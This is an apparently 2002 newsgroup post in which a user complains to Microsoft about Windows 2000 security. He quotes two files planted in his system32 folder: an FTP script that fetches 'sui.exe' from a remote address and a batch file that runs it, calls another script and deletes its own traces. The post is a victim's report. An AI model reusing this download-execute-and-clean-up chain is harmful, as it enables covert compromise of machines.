Is it really true that NTFS is secure?

From: George Hester (
Date: 12/12/02

From: "George Hester" <>
Date: Thu, 12 Dec 2002 10:42:51 -0500

'--------- File: s.t sitting in %SystemRoot%\system32 ->
open #my.ip.address# 'chnaged ip for privacy
recv sui.exe .\sui.exe
/-------- End of s.t

REM File r.bat sitting in %SystemRoot%\system32 -->
ftp -vnAs:s.t
del s.t
sui.exe -s678p345 -o
call g.bat
del r.bat
REM End of r.bat --------

Windows 2000 Professional SP3 IIS Updated OEX SP1 "Fixed" IE 6 SP1 NTFS File system

I think not.

Microsoft your promise of addressing Security I'm not at all happy with it. The Criminals on the Net are showing you up. They are getting the upper hand on you. And your silence in this matter speaks louder then your willy-nilly ideas of what to do about it.

If you really want to do something about security analyze this.

I am not at all happy with you in this regard.

George Hester